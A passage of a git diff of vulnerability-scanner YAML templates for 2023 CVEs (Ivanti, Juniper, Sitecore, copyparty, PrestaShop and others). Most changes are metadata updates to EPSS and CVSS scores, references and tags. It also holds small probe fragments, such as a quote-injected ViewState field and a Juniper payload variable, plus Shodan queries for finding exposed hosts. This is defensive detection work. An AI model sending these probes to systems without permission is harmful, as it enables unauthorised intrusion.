cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +28,7 @@ info: vendor: chamilo product: chamilo shodan-query: http.component:"Chamilo" - tags: cve,cve2023,chamilo + tags: packetstorm,cve,cve2023,chamilo http: - raw: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 692c37e8b1..bc5acd9e9e 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.96524 - epss-percentile: 0.99414 + epss-score: 0.95943 + epss-percentile: 0.99267 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 63c61a2709..2297e953ae 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35082 cwe-id: CWE-287 - epss-score: 0.52767 - epss-percentile: 0.97143 + epss-score: 0.07696 + epss-percentile: 0.93419 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 283d4444b9..9d6378609a 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -10,13 +10,14 @@ info: - https://support.sitecore.com/kb?id=kb_article_view\u0026sysparm_article=KB1002979 - https://code-white.com/blog/exploiting-asp.net-templateparser-part-1/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35813 + - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1002979 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 - epss-score: 0.00201 - epss-percentile: 0.57635 + epss-score: 0.2157 + epss-percentile: 0.9587 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -24,7 +25,6 @@ info: product: experience_commerce shodan-query: title:"Sitecore" tags: cve,cve2023,sitecore,rce - variables: string: "{{rand_base(6)}}" payload: | @@ -52,4 +52,4 @@ http: - contains(content_type, '{{string}}') - contains_all(body, 'commands', 'command', 'value') - status_code == 200 - condition: and \ No newline at end of file + condition: and diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 94e5fb7d71..ff8c7dce91 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35843 cwe-id: CWE-22 - epss-score: 0.01632 - epss-percentile: 0.85943 + epss-score: 0.01891 + epss-percentile: 0.87126 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index bdcdb2df02..57bd2824c4 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-35844 cwe-id: CWE-22 epss-score: 0.00499 - epss-percentile: 0.73306 + epss-percentile: 0.73586 cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index e7072f1c3d..44eb70666b 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 - epss-score: 0.01968 - epss-percentile: 0.87262 + epss-score: 0.02149 + epss-percentile: 0.88019 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 2c8b4321c2..8f300ca31f 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31522 + epss-percentile: 0.31878 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 34f72b85e7..8f3449cc4f 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31522 + epss-percentile: 0.31878 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index af4315fe56..f75a39cbe7 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -19,10 +19,11 @@ info: cve-id: CVE-2023-36346 cwe-id: CWE-79 epss-score: 0.00075 + epss-percentile: 0.30972 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: codekop product: codekop tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 8ed170acac..722cfa5ccb 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -13,13 +13,14 @@ info: - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844 - https://supportportal.juniper.net/JSA72300 - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.02371 - epss-percentile: 0.88443 + epss-score: 0.02557 + epss-percentile: 0.88989 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +28,7 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" - tags: cve,cve2023,juniper,php,rce,intrusive,fileupload + tags: packetstorm,cve,cve2023,juniper,php,rce,intrusive,fileupload variables: value: "CVE-2023-36844" payload: "('')" diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index aea29fd87a..376f69cb7d 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -3,20 +3,22 @@ id: CVE-2023-36845 info: name: Juniper J-Web - Remote Code Execution author: yaser_s - severity: medium + severity: critical description: | A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands reference: - https://vulncheck.com/blog/juniper-cve-2023-36845 - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ + - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html + - https://supportportal.juniper.net/JSA72300 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-36845 cwe-id: CWE-473 - epss-score: 0.00046 - epss-percentile: 0.14237 + epss-score: 0.37937 + epss-percentile: 0.96751 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 118cb4b175..6c18d0ab6f 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.15657 - epss-percentile: 0.95206 + epss-score: 0.01933 + epss-percentile: 0.87299 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index f337c7cc4c..d0acf3089e 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.1326 - epss-percentile: 0.94837 + epss-score: 0.10208 + epss-percentile: 0.94294 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 3ac1552273..fe7a3dad42 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.06744 - epss-percentile: 0.92955 + epss-score: 0.05083 + epss-percentile: 0.92032 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 9b750d38a1..3748513b35 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 - epss-score: 0.01274 - epss-percentile: 0.83984 + epss-score: 0.01401 + epss-percentile: 0.84924 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 95a26e8c2c..e2d1c11797 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-37462 cwe-id: CWE-74 epss-score: 0.36071 - epss-percentile: 0.96614 + epss-percentile: 0.96662 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 02931d6a62..24b40e70d9 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -10,16 +10,21 @@ info: - https://github.com/9001/copyparty/ - https://www.exploit-db.com/exploits/51636 - https://nvd.nist.gov/vuln/detail/CVE-2023-37474 + - http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html + - https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 + epss-score: 0.02398 + epss-percentile: 0.88652 + cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: copyparty - product: copyparty verified: true + max-request: 1 + vendor: copyparty_project + product: copyparty tags: cve,cve2023,traversal,copyparty http: diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 5f92caf6b8..559e3abd4b 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.20311 - epss-percentile: 0.95707 + epss-score: 0.1975 + epss-percentile: 0.95725 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index d314d95df1..df74f63ad0 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -9,14 +9,20 @@ info: reference: - https://www.exploit-db.com/exploits/51598 - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 + - https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 + epss-score: 0.13691 + epss-percentile: 0.94984 + cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: simple_online_piggery_management_system_project + product: simple_online_piggery_management_system tags: cve,cve2023,fileupload,rce,opms,intrusive http: diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 862b78fda7..fa5b98cb82 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 - epss-score: 0.00713 - epss-percentile: 0.78017 + epss-score: 0.00525 + epss-percentile: 0.74271 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 9bdd851be7..fc90c573fb 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -13,13 +13,14 @@ info: - https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/ - https://github.com/horizon3ai/CVE-2023-38035 - https://nvd.nist.gov/vuln/detail/CVE-2023-38035 + - http://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 - epss-score: 0.91817 - epss-percentile: 0.98531 + epss-score: 0.97082 + epss-percentile: 0.99687 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index d07e06ee53..aaf7ac3a60 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -15,7 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-38205 - cwe-id: CWE-284 + cwe-id: CWE-284,NVD-CWE-Other + epss-score: 0.8321 + epss-percentile: 0.98037 + cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 818729513a..a9f991443b 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 - epss-score: 0.04304 - epss-percentile: 0.91215 + epss-score: 0.03083 + epss-percentile: 0.89889 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 4cd377a030..87b175d696 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -15,12 +15,18 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 + cve-id: CVE-2023-38433 cwe-id: CWE-798 + epss-score: 0.00438 + epss-percentile: 0.71853 + cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: - max-req: 1 - max-request: 2 - shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' verified: true + max-request: 2 + vendor: fujitsu + product: ip-he950e_firmware + shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' + max-req: 1 tags: cve,cve2023,fujitsu,ip-series http: @@ -45,6 +51,7 @@ http: part: body words: - 'Field Support' + - type: status status: - 200 diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 8485b0cda0..56e01c8405 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -12,15 +12,20 @@ info: - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38 - https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh - https://nvd.nist.gov/vuln/detail/CVE-2023-38501 + - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 + epss-score: 0.00282 + epss-percentile: 0.64882 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: copyparty_project + product: copyparty shodan-query: title:"copyparty" tags: copyparty,cve,cve2023,xss diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index fe6379c9e0..0b1326720f 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38646 epss-score: 0.54087 - epss-percentile: 0.97174 + epss-percentile: 0.97224 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index da9a7514ac..02f2f37a16 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -13,13 +13,14 @@ info: - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-39026 - https://www.filemage.io/docs/updates.html#change-log + - http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39026 cwe-id: CWE-22 - epss-score: 0.01308 - epss-percentile: 0.84224 + epss-score: 0.06593 + epss-percentile: 0.92962 cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index f3eb0f6d0a..c5ac2bd416 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39141 cwe-id: CWE-22 epss-score: 0.00491 - epss-percentile: 0.73119 + epss-percentile: 0.73408 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index fcebd250d2..98961d266a 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39143 cwe-id: CWE-22 - epss-score: 0.92137 - epss-percentile: 0.98563 + epss-score: 0.89139 + epss-percentile: 0.98372 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 8857a4662c..b776ce39de 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3936 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29286 + epss-percentile: 0.2962 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index ddd9e6365d..cef82a794e 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -9,14 +9,21 @@ info: reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg - https://nvd.nist.gov/vuln/detail/CVE-2023-39361 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/ + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/ classification: - cve-id: CVE-2023-39361 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-39361 cwe-id: CWE-89 + epss-score: 0.04912 + epss-percentile: 0.91889 + cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: cacti + product: cacti shodan-query: title:"Login to Cacti" tags: cve,cve2023,cacti,sqli diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index c8053aa70f..bd0c0b2607 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -10,10 +10,20 @@ info: - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-39598 + cwe-id: CWE-79 + epss-score: 0.0062 + epss-percentile: 0.76451 + cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"icewarp" verified: "true" + max-request: 1 + vendor: icewarp + product: webclient + shodan-query: title:"icewarp" tags: cve,cve2023,xss,icewarp http: diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 69013a9270..7c948fa81a 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -9,19 +9,20 @@ info: reference: - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 + - https://icewarp.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-39600 cwe-id: CWE-79 - epss-score: 0.0046 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* - epss-percentile: 0.72232 + epss-score: 0.0007 + epss-percentile: 0.29114 + cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"icewarp" vendor: icewarp - product: icewarp_server + product: icewarp + shodan-query: title:"icewarp" tags: cve,cve2023,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 750c89c505..b17677b13c 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -8,10 +8,23 @@ info: Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ + - https://sorcery.ie + - https://themeforest.net/user/fieldthemes + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-39676 + cwe-id: CWE-79 + epss-score: 0.00183 + epss-percentile: 0.55307 + cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: - max-request: 1 - shodan-query: html:"fieldpopupnewsletter" verified: "true" + max-request: 1 + vendor: fieldthemes + product: fieldpopupnewsletter + framework: prestashop + shodan-query: html:"fieldpopupnewsletter" tags: cve,cve2023,prestashop,xss http: diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 901b769e1d..67ee50b801 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -3,16 +3,28 @@ id: CVE-2023-39677 info: name: PrestaShop MyPrestaModules - PhpInfo Disclosure author: meme-lord - severity: low + severity: high description: | PrestaShop modules by MyPrestaModules expose PHPInfo reference: - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ - https://cve.report/CVE-2023-39677 + - https://myprestamodules.com/ + - https://sorcery.ie + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-39677 + epss-score: 0.00632 + epss-percentile: 0.76663 + cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: - max-request: 2 - shodan-query: http.component:"PrestaShop" verified: true + max-request: 2 + vendor: simpleimportproduct_project + product: simpleimportproduct + framework: prestashop + shodan-query: http.component:"PrestaShop" tags: cve,cve2023,prestashop,phpinfo,disclosure http: diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 986a192ef3..51077297dd 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -9,13 +9,19 @@ info: reference: - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md - https://nvd.nist.gov/vuln/detail/CVE-2023-41642 + - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/f7aafa9fcd4efa30071c7f77d3e9e6b14e92302b/CVE%20PoC/CVE-2023-41642%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md classification: - cve-id: CVE-2023-41642 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-score: 6.1 + cve-id: CVE-2023-41642 cwe-id: CWE-79 + epss-score: 0.00068 + epss-percentile: 0.28522 + cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 + vendor: grupposcai + product: realgimm tags: cve,cve2023,realgimm,xss http: @@ -27,7 +33,6 @@ http: User-Agent: __EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu= - - | GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1 Host: {{Hostname}} @@ -35,6 +40,7 @@ http: host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 045b97d614..eea37df4c3 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-4173 cwe-id: CWE-79 epss-score: 0.00176 - epss-percentile: 0.54027 + epss-percentile: 0.54451 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 93703388d3..36f0e8b13d 100644 --- 